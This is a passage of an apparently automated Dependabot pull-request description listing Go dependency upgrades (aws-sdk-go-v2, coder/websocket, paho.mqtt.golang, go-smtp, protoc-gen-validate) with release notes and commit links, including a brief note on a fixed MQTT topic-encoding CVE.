href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.29.12...config/v1.32.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/s3` from 1.78.2 to 1.98.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ba7e432545fa3203d98f593b2aceaba66c02db7a\"\u003e\u003ccode\u003eba7e432\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/607cb0afad6e6a655a356be54f9fdec5cc558a80\"\u003e\u003ccode\u003e607cb0a\u003c/code\u003e\u003c/a\u003e Release 2026-03-30\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a44005fd4a2e2b7308c0346da970890757aaeda5\"\u003e\u003ccode\u003ea44005f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dbbd8465f03f1931d85d38af45f18362cbc4c469\"\u003e\u003ccode\u003edbbd846\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5b5c3f960e98cf024a8b7d6a6a8f0a1452e028fa\"\u003e\u003ccode\u003e5b5c3f9\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;drop service/internal/benchmark (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3368\"\u003e#3368\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3369\"\u003e#3369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7ca3f9d52a718e4be3a78be0d05e6437ae362e20\"\u003e\u003ccode\u003e7ca3f9d\u003c/code\u003e\u003c/a\u003e drop service/internal/benchmark (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3368\"\u003e#3368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/338088bc3ce801d773863578da6a0a835d6012af\"\u003e\u003ccode\u003e338088b\u003c/code\u003e\u003c/a\u003e Release 2026-03-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f0e5f3dc09ddb548bccfc11b297229839516bff9\"\u003e\u003ccode\u003ef0e5f3d\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.78.2...service/s3/v1.98.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/coder/websocket` from 1.8.13 to 1.8.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/coder/websocket/releases\"\u003egithub.com/coder/websocket's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.8.14\u003c/h2\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: match Origin scheme if defined in OriginPatterns by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/536\"\u003ecoder/websocket#536\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: use \u003ccode\u003econtext.AfterFunc\u003c/code\u003e to track timeouts instead of goroutine by \u003ca href=\"https://github.com/ash2k\"\u003e\u003ccode\u003e@​ash2k\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/532\"\u003ecoder/websocket#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: add \u003ccode\u003eErrMessageTooBig\u003c/code\u003e sentinel error for limited reads by \u003ca href=\"https://github.com/DanielleMaywood\"\u003e\u003ccode\u003e@​DanielleMaywood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/535\"\u003ecoder/websocket#535\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: update to Go 1.23 by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/524\"\u003ecoder/websocket#524\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: add Makefile by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/525\"\u003ecoder/websocket#525\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update LICENSE file by \u003ca href=\"https://github.com/mtojek\"\u003e\u003ccode\u003e@​mtojek\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/526\"\u003ecoder/websocket#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: apply various modernisations by \u003ca href=\"https://github.com/Jacalz\"\u003e\u003ccode\u003e@​Jacalz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/531\"\u003ecoder/websocket#531\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mtojek\"\u003e\u003ccode\u003e@​mtojek\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/526\"\u003ecoder/websocket#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ash2k\"\u003e\u003ccode\u003e@​ash2k\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/532\"\u003ecoder/websocket#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DanielleMaywood\"\u003e\u003ccode\u003e@​DanielleMaywood\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/535\"\u003ecoder/websocket#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/coder/websocket/compare/v1.8.13...v1.8.14\"\u003ehttps://github.com/coder/websocket/compare/v1.8.13...v1.8.14\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/7d7c644330e727379c3e33fddc154ac208b925f3\"\u003e\u003ccode\u003e7d7c644\u003c/code\u003e\u003c/a\u003e refactor: add \u003ccode\u003eErrMessageTooBig\u003c/code\u003e sentinel error for limited reads (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/535\"\u003e#535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/c7846ea6a8849fe21aed3b8319bac906e8cb1dca\"\u003e\u003ccode\u003ec7846ea\u003c/code\u003e\u003c/a\u003e refactor: use \u003ccode\u003econtext.AfterFunc\u003c/code\u003e to track timeouts instead of goroutine (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/e11dd4e741173381256344d57b3bfc3fa38a9d25\"\u003e\u003ccode\u003ee11dd4e\u003c/code\u003e\u003c/a\u003e fix: match Origin scheme if defined in OriginPatterns (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/536\"\u003e#536\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/91013c129147ee6375b65cf150fa151d2fcc0bce\"\u003e\u003ccode\u003e91013c1\u003c/code\u003e\u003c/a\u003e chore: apply various modernisations (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/efb626be44240d7979b57427265d9b6402166b96\"\u003e\u003ccode\u003eefb626b\u003c/code\u003e\u003c/a\u003e chore: update LICENSE file (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/526\"\u003e#526\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/246891f172ef96b0b5681c8e4d59dfd32ad1b091\"\u003e\u003ccode\u003e246891f\u003c/code\u003e\u003c/a\u003e build: add Makefile (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/778d161bfd21f3cfa8052d8b84e8c86e08ce41c7\"\u003e\u003ccode\u003e778d161\u003c/code\u003e\u003c/a\u003e build: update to Go 1.23 (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/524\"\u003e#524\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/coder/websocket/compare/v1.8.13...v1.8.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/eclipse/paho.mqtt.golang` from 1.5.0 to 1.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eclipse/paho.mqtt.golang/releases\"\u003egithub.com/eclipse/paho.mqtt.golang's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.5.1\u003c/h2\u003e\n\u003cp\u003eThis is a minor release incorporating changes made in the 14 months since v1.5.0 (including updating dependencies, and raising the Go version to 1.24). The changes are relatively minor but address a potential security issue (\u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2025-10543\"\u003eCVE-2025-10543\u003c/a\u003e), possible panic, enable users to better monitor the connection status, and incorporate a few optimisations.\u003c/p\u003e\n\u003cp\u003eThanks to those who have provided fixes/enhancements included in this release!\u003c/p\u003e\n\u003cp\u003eSpecial thanks to Paul Gerste at \u003ca href=\"https://www.sonarsource.com/\"\u003eSonar\u003c/a\u003e for reporting issue \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/730\"\u003e#730\u003c/a\u003e via the Eclipse security team (fix was implemented in PR \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/714\"\u003e#714\u003c/a\u003e in May, github issue created just prior to this release). This issue arose where a topic \u0026gt; 65535 bytes was passed to the \u003ccode\u003ePublish\u003c/code\u003e function, due to the way the data was encoded the topic could leak into the message body. Please see issue \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/730\"\u003e#730\u003c/a\u003e or \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2025-10543\"\u003eCVE-2025-10543\u003c/a\u003e for further details.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdating go dependencies from pub and sub into the containers before building by \u003ca href=\"https://github.com/JefJrFigueiredo\"\u003e\u003ccode\u003e@​JefJrFigueiredo\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/691\"\u003eeclipse-paho/paho.mqtt.golang#691\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOptimize TCP connection logic by \u003ca href=\"https://github.com/geekeryy\"\u003e\u003ccode\u003e@​geekeryy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/713\"\u003eeclipse-paho/paho.mqtt.golang#713\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFields over 65535 bytes not encoded correctly by \u003ca href=\"https://github.com/MattBrittan\"\u003e\u003ccode\u003e@​MattBrittan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/714\"\u003eeclipse-paho/paho.mqtt.golang#714\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReduce slice allocations in route dispatch  by \u003ca href=\"https://github.com/alespour\"\u003e\u003ccode\u003e@​alespour\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/710\"\u003eeclipse-paho/paho.mqtt.golang#710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd a ConnectionNotificationHandler by \u003ca href=\"https://github.com/RangelReale\"\u003e\u003ccode\u003e@​RangelReale\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/727\"\u003eeclipse-paho/paho.mqtt.golang#727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePotential panic when using manual ACK by \u003ca href=\"https://github.com/MattBrittan\"\u003e\u003ccode\u003e@​MattBrittan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/729\"\u003eeclipse-paho/paho.mqtt.golang#729\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/compare/v1.5.0...v1.5.1\"\u003ehttps://github.com/eclipse-paho/paho.mqtt.golang/compare/v1.5.0...v1.5.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/b30523793968e6b7a7b1f76338a58c4fe9755299\"\u003e\u003ccode\u003eb305237\u003c/code\u003e\u003c/a\u003e Update dependencies in docker examples\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/35ee03d8496f3256cc2bf7af15fea56e21c29c96\"\u003e\u003ccode\u003e35ee03d\u003c/code\u003e\u003c/a\u003e Potential panic when using manual ACK\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/433bd22ae6ac92daf00d575def72e425bc21e39f\"\u003e\u003ccode\u003e433bd22\u003c/code\u003e\u003c/a\u003e address data race in test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/4debe3a76a5aa8f27a2616e2d4e3fc53be0dc788\"\u003e\u003ccode\u003e4debe3a\u003c/code\u003e\u003c/a\u003e Potential panic when using manual ACK\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/601453b38642642382165ab9689b20cd025d102a\"\u003e\u003ccode\u003e601453b\u003c/code\u003e\u003c/a\u003e Resolve issues in fvt_client_test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/439e2ab4c07d55c124fe03e8bb6273b93c88b61a\"\u003e\u003ccode\u003e439e2ab\u003c/code\u003e\u003c/a\u003e Dependency update (also rise Go version to 1.24)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/d27659335abe44a2838ac4c8e807dd66ee208ed0\"\u003e\u003ccode\u003ed276593\u003c/code\u003e\u003c/a\u003e ConnectionNotificationHandler - generic callback for all types of connection ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/8a350a9cff7682fc5d8d741b6e9c5b7def7b2661\"\u003e\u003ccode\u003e8a350a9\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/5620c5ed09ab99bde96402f052e548fd95d4e0c3\"\u003e\u003ccode\u003e5620c5e\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/45048ccc79f333b4ac41ab1723aa94d63fb5ed01\"\u003e\u003ccode\u003e45048cc\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/eclipse/paho.mqtt.golang/compare/v1.5.0...v1.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/emersion/go-smtp` from 0.22.0 to 0.24.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/ab24fe7cbe995d404af3b1c093195f2f43b94688\"\u003e\u003ccode\u003eab24fe7\u003c/code\u003e\u003c/a\u003e Remove superfluous validateLine() calls in sendMail()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/6944e3381b812d9b418405939b07780809df6c82\"\u003e\u003ccode\u003e6944e33\u003c/code\u003e\u003c/a\u003e Implement MT-PRIORITY (RFC 6710)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/54dd31d837eeef5d7d699c352bd03a8b4591e5d7\"\u003e\u003ccode\u003e54dd31d\u003c/code\u003e\u003c/a\u003e Implement DELIVERBY (RFC 2852)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/emersion/go-smtp/compare/v0.22.0...v0.24.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/envoyproxy/protoc-gen-validate` from 1.2.1 to 1.3.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/envoyproxy/protoc-gen-validate/releases\"\u003egithub.com/envoyproxy/protoc-gen-validate's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.3\u003c/h2\u003e\n\u003cp\u003eOne more release attempt to get Python published on PyPI. 😄\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Python 3.9 references to 3.10 by \u003ca href=\"https://github.com/stefanvanburen\"\u003e\u003ccode\u003e@​stefanvanburen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1370\"\u003ebufbuild/protoc-gen-validate#1370\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.2...v1.3.3\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.2...v1.3.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.2\u003c/h2\u003e\n\u003cp\u003eFixing the \u003ccode\u003ev1.3.1\u003c/code\u003e release, which was fixing the \u003ccode\u003ev1.3.0\u003c/code\u003e release 😄.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAttempt to fix release by \u003ca href=\"https://github.com/stefanvanburen\"\u003e\u003ccode\u003e@​stefanvanburen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1368\"\u003ebufbuild/protoc-gen-validate#1368\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.1...v1.3.2\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.1...v1.3.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.1\u003c/h2\u003e\n\u003cp\u003eThis is a release to get out \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/issues/1333\"\u003ePython support for 3.13\u003c/a\u003e, which failed to publish to PyPI in \u003ccode\u003ev1.3.0\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump the java group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1332\"\u003ebufbuild/protoc-gen-validate#1332\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 5 to 6 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1330\"\u003ebufbuild/protoc-gen-validate#1330\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix Java deployment by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1335\"\u003ebufbuild/protoc-gen-validate#1335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate settings.xml to use SONATYPE_USERNAME env var by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1336\"\u003ebufbuild/protoc-gen-validate#1336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRun deployment with release profile by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1337\"\u003ebufbuild/protoc-gen-validate#1337\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove maven settings.xml file by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1338\"\u003ebufbuild/protoc-gen-validate#1338\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1334\"\u003ebufbuild/protoc-gen-validate#1334\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the github-actions group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1341\"\u003ebufbuild/protoc-gen-validate#1341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1340\"\u003ebufbuild/protoc-gen-validate#1340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the go-tests group in /tests with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1339\"\u003ebufbuild/protoc-gen-validate#1339\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group across 1 directory with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1343\"\u003ebufbuild/protoc-gen-validate#1343\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport for latest setuptools by \u003ca href=\"https://github.com/matejsp\"\u003e\u003ccode\u003e@​matejsp\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1345\"\u003ebufbuild/protoc-gen-validate#1345\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace deprecated java_proto_library from rules_java by \u003ca href=\"https://github.com/mmorel-35\"\u003e\u003ccode\u003e@​mmorel-35\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1349\"\u003ebufbuild/protoc-gen-validate#1349\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.48.0 to 0.49.0 in /tests in the go-tests group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1350\"\u003ebufbuild/protoc-gen-validate#1350\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group across 